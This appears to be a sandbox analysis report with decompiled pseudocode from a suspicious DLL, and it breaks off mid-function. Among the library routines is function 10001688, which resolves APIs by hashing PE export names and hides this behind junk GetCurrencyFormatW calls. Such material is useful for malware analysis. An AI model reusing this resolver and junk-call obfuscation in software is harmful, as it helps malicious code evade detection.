eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10002917, 1000292D, 10002932, 10002950, 1000296D, 100029AF, 100029BC, 100029EB, 10002A0A, 10002A23, 10002A4F, 10002A6E, 10002A97, 10002AB8, 10002AEC, 10002B01, 10002B29, 10002B52, 10002B65, 10002B81, 10002BAE

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 53cc18772c5c51637f45663d1903c786bbf5cef672ca4e34036eb6a9dd3be76e
Instruction ID: 79824c52bf8429aa3b3288a891149b50f2ccf3fe83c12eb32a247a59d7a1ec18
Opcode Fuzzy Hash: 53cc18772c5c51637f45663d1903c786bbf5cef672ca4e34036eb6a9dd3be76e
Instruction Fuzzy Hash: 19815971A44315BFE214DBA1CD86F1BBBECEB8AB48F01081EF7409A2D1D671A9108F65

Uniqueness

Uniqueness Score: -1.00%

Function 1000C177 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1000C177(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E1001FC2D(E10033686, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x10004e88);
				 *(_t116 - 0x120) = _t110;
				_t54 = E10010A4A(_t94, 0x10048490, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E10004E6E(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t55 = E1000EC09(_t94, _t106, _t111, __eflags);
					__eflags = _t111;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x1004886c;
						if( *0x1004886c == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x1004846c;
								if( *0x1004846c != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x1004846c; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t116 - 0x14) = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E1000C033);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E10020F40(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E100093B7(_t94, _t97, _t106, "#32768", __eflags);
								__eflags = _t72;
								 *0x1004846c = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E1002290B(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1000EC55(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E1000A931(_t111, _t116, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1000B02E);
							__eflags = _t83 - E1000B02E;
							if(_t83 != E1000B02E) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E1000E519();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E10005CC1(_t87, "ime");
						__eflags = _t88;
						_pop(_t97);
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E1001FCB0(_t94, _t105, _t110);
				}
			}

0x1000c177
0x1000c177
0x1000c177
0x1000c181
0x1000c186
0x1000c189
0x1000c18c
0x1000c196
0x1000c19c
0x1000c1a3
0x1000c1a5
0x1000c1a8
0x1000c1ae
0x1000c1b0
0x1000c1b2
0x1000c1b2
0x1000c1bb
0x1000c1d0
0x1000c1d2
0x1000c1d5
0x1000c1da
0x1000c1dc
0x1000c1e0
0x1000c1e6
0x1000c1fd
0x1000c1fd
0x1000c204
0x1000c251
0x1000c251
0x1000c253
0x1000c2bb
0x1000c2c3
0x1000c2ff
0x1000c30b
0x1000c312
0x1000c344
0x1000c347
0x1000c34d
0x1000c34f
0x1000c352
0x1000c35a
0x1000c361
0x1000c363
0x1000c365
0x1000c36c
0x1000c374
0x1000c376
0x1000c379
0x1000c37c
0x1000c38a
0x1000c38a
0x1000c379
0x1000c365
0x1000c390
0x1000c396
0x1000c3a2
0x1000c3a8
0x1000c3af
0x1000c3b1
0x1000c3b6
0x1000c3bc
0x1000c3bc
0x1000c3bc
0x1000c3bc
0x00000000
0x1000c3c0
0x00000000
0x1000c314
0x1000c2c7
0x1000c2d2
0x1000c2dd
0x1000c2e3
0x1000c2e9
0x1000c2ea
0x1000c2ec
0x1000c2f4
0x1000c2f7
0x1000c2fd
0x1000c323
0x1000c329
0x1000c32b
0x00000000
0x00000000
0x1000c335
0x1000c339
0x1000c33e
0x1000c342
0x00000000
0x00000000
0x00000000
0x1000c342
0x00000000
0x1000c2fd
0x1000c25b
0x1000c260
0x1000c267
0x1000c270
0x1000c286
0x1000c288
0x1000c28e
0x1000c290
0x1000c292
0x1000c292
0x1000c29a
0x1000c29e
0x1000c2a2
0x1000c2a6
0x1000c2ac
0x1000c2af
0x1000c2b1
0x1000c2b1
0x00000000
0x1000c2a6
0x1000c209
0x1000c20f
0x1000c214
0x00000000
0x00000000
0x1000c21a
0x1000c21d
0x1000c222
0x1000c22f
0x1000c233
0x1000c239
0x1000c239
0x1000c242
0x1000c247
0x1000c24a
0x1000c24b
0x00000000
0x00000000
0x00000000
0x1000c24b
0x1000c1e8
0x1000c1ef
0x00000000
0x00000000
0x1000c1f5
0x1000c1f7
0x00000000
0x00000000
0x00000000
0x1000c1bd
0x1000c1c5
0x1000c3c2
0x1000c3c7
0x1000c3c7

APIs

__EH_prolog3_GS.LIBCMT ref: 1000C181

Part of subcall function 10010A4A: __EH_prolog3.LIBCMT ref: 10010A51

CallNextHookEx.USER32(?,?,?,?), ref: 1000C1C5

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

GetClassLongA.USER32 ref: 1000C209
GlobalGetAtomNameA.KERNEL32 ref: 1000C233
SetWindowLongA.USER32 ref: 1000C288
_memset.LIBCMT ref: 1000C2D2
GetClassLongA.USER32 ref: 1000C302
GetClassNameA.USER32(?,?,00000100), ref: 1000C323
GetWindowLongA.USER32 ref: 1000C347
GetPropA.USER32 ref: 1000C361
SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1000C36C
GetPropA.USER32 ref: 1000C374
GlobalAddAtomA.KERNEL32 ref: 1000C37C
SetWindowLongA.USER32 ref: 1000C38A
CallNextHookEx.USER32(?,00000003,?,?), ref: 1000C3A2
UnhookWindowsHookEx.USER32(?), ref: 1000C3B6

Strings

ime, xrefs: 1000C23C
AfxOldWndProc423, xrefs: 1000C35A, 1000C35F, 1000C36A, 1000C372, 1000C37B
#32768, xrefs: 1000C2E4, 1000C2E9, 1000C333

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423$ime
API String ID: 1191297049-4034971020
Opcode ID: fa5ef0e6d9e371cfd272aca91c122599bb0de00c0ced2b86db92b24c7c9bf750
Instruction ID: 7666ce8964d8ee3f6bc6ffcfd40649ad75606c78465d6ba84a3d7def91f03792
Opcode Fuzzy Hash: fa5ef0e6d9e371cfd272aca91c122599bb0de00c0ced2b86db92b24c7c9bf750
Instruction Fuzzy Hash: F461B17190036AAFEB15DB60CC49F9E7BB8EF083D1F114154F509A6196DB34AE81CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10001688 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 204
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E10001688(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v4;
				signed int _v8;
				intOrPtr _v12;
				int _v16;
				intOrPtr _v20;
				void* _t113;
				short* _t126;
				short* _t142;

				_t142 = L"xadqsavcbdfewescGADW";
				_t126 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v20 = (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 << 6) + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) * 0xf8;
				_v16 = (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) + _v16) *  *0x100440d0 +  *((intOrPtr*)(_v20 + 0x3c)) + _a4;
				_v16 = _v16 + 0x78 + GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d8 * 8;
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d4 * 0x28 +  *_v16 + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440cc;
				_v12 =  *((intOrPtr*)(_v20 + 0x20)) + GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 * 4 + _v16 + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440cc << 2;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v20 + 0x1c)) + _v16 + _a4;
				_v16 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440e0 + GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440e0;
				_v8 = GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v20 + 0x24)) + _v16 + _a4;
				_v16 = 0;
				if(GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_v20 + 0x18)) == 0) {
					L3:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t113 = E100014CF( *((intOrPtr*)(_v12 + (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440dc + _v16) * 4)) + _a4);
					_push(0x22b9);
					_push(_t142);
					_push(0);
					_push(_t126);
					_push(0x11d4);
					_push(0);
					if(_t113 == _a8) {
						break;
					}
					_v16 = _v16 + 1;
					if(_v16 < GetCurrencyFormatW(??, ??, ??, ??, ??, ??) *  *0x100440dc +  *((intOrPtr*)(_v20 + 0x18))) {
						continue;
					}
					goto L3;
				}
				_v8 =  *(_v8 + (GetCurrencyFormatW() *  *0x100440d4 + _v16) * 2) & 0x0000ffff;
				return  *((intOrPtr*)(_v4 + (GetCurrencyFormatW(0, 0x11d4, _t126, 0, _t142, 0x22b9) *  *0x100440e0 + _v8) * 4)) + _a4;
			}

0x1000169a
0x100016a2
0x100016cc
0x100016e4
0x1000170c
0x1000172d
0x10001753
0x1000176c
0x10001797
0x100017b3
0x100017db
0x100017f6
0x10001818
0x10001822
0x10001836
0x1000188f
0x00000000
0x00000000
0x00000000
0x00000000
0x10001838
0x10001838
0x1000185d
0x10001867
0x1000186c
0x1000186d
0x1000186f
0x10001870
0x10001871
0x10001873
0x00000000
0x00000000
0x10001875
0x1000188d
0x00000000
0x00000000
0x00000000
0x1000188d
0x100018ba
0x00000000

APIs

GetCurrencyFormatW.KERNEL32 ref: 100016B0
GetCurrencyFormatW.KERNEL32 ref: 100016D0
GetCurrencyFormatW.KERNEL32 ref: 100016E8
GetCurrencyFormatW.KERNEL32 ref: 10001710
GetCurrencyFormatW.KERNEL32 ref: 10001731
GetCurrencyFormatW.KERNEL32 ref: 10001757
GetCurrencyFormatW.KERNEL32 ref: 10001770
GetCurrencyFormatW.KERNEL32 ref: 1000179B
GetCurrencyFormatW.KERNEL32 ref: 100017B7
GetCurrencyFormatW.KERNEL32 ref: 100017DF
GetCurrencyFormatW.KERNEL32 ref: 100017FA
GetCurrencyFormatW.KERNEL32 ref: 10001826
GetCurrencyFormatW.KERNEL32 ref: 10001844
GetCurrencyFormatW.KERNEL32 ref: 10001879
GetCurrencyFormatW.KERNEL32 ref: 10001899
GetCurrencyFormatW.KERNEL32 ref: 100018BE

Strings

xadqsavcbdfewescGADW, xrefs: 1000168C, 1000169A, 1000169F, 100016BE, 100016DD, 10001705, 10001722, 1000174C, 10001765, 10001785, 100017A9, 100017D0, 100017ED, 10001813, 1000183D, 1000186C, 100018B3
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 1000168B, 100016A2, 100016A7, 100016C1, 100016E0, 10001708, 10001725, 1000174F, 10001768, 10001793, 100017AC, 100017D7, 100017F0, 1000181F, 10001840, 1000186F, 100018B6

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 30569eb8c03e8ad6ff96c7b993bd8e32f972026cb2052b8f5c109cfadb6c887f
Instruction ID: 8a616b6614b71244b568cdf68a4d548a50dd06c55d0bd6723b2e1342b5ff1104
Opcode Fuzzy Hash: 30569eb8c03e8ad6ff96c7b993bd8e32f972026cb2052b8f5c109cfadb6c887f
Instruction Fuzzy Hash: 55614BB1A44315BFE204DB91CD86F1BBBECEB8AB48F111809F7409A2D1C671EA158F65

Uniqueness

Uniqueness Score: -1.00%

Function 1001DB64 Relevance: 28.9, APIs: 19, Instructions: 423
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E1001DB64(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E1001FBC4(E10034A5C, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E1001FC9C(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E10020F40(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x10038ec0;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 =  *(_t300 - 0x4c) - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if( *(_t300 - 0x4c) == _t257) {
					L37:
					_t295 = 0;
					E1001BDF4(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E10020F40(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1003b19c, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E1001DB0D(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E10004D75(_t257, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E1001CE04(_t300 - 0x68);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E10004D75(_t257, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M1001E0F4))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E10010B51(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E100050DA(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E10004D4A(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E1001D564(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								E10005422(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								E10005422(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								E10005422(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							E100209E8(_t300 + 0x14, 0x10040d04);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t297 = E10004D4A(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E10020F40(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M1001E0A8))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
